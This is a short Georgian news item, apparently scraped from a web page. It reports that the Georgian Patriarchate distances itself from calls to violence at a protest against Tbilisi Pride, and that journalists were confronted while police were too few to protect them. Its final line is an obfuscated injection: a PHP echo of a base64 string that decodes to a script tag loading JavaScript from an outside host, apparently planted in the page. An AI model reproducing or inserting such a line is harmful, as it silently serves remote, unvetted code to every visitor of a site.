celsiusi
ავერსი საქკაბელი
საპატრიარქოში აცხადებენ, რომ ემიჯნებიან დღევანდელი აქციის დროს დაფიქსირებულ ძალადობისკენ მოწოდებებს. ამის შესახებ საქართველოს საპატრიარქოს საზოგადოებასთან ურთიერთობის სამსახურის მიერ გავრცელებულ განცხადებაშია აღნიშნული, რითაც „თბილისი პრაიდთან“ დაკავშირებით განვითარებულ მოვლენებს ეხმაურებიან.
 
„კიდევ ერთხელ ერთმნიშვნელოვნად ვაცხადებთ, რომ ეკლესია ემიჯნება დღევანდელი აქციის დროს დაფიქსირებულ ძალადობისკენ მოწოდებებს. სასულიერო პირების მიერ ჩადენილ მსგავს ფაქტებზე უახლოეს მომავალში მოხდება რეაგირება“,-აღნიშნულია გავრცელებულ განცხადებაში.
 
შეგახსენებთ, რომ მარშის მოწინააღმდეგეები ჟურნალისტებს, ოპერატორებსა და მედიის სხვა თანამშრომლებს დილიდან უპირისპირდებიან, თუმცა პოლიციელთა არასაკმარისი რაოდენობის მობილიზების გამო, სამართალდამცავები მათ უსაფრთხოებას ვერ იცავენ.
1202
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");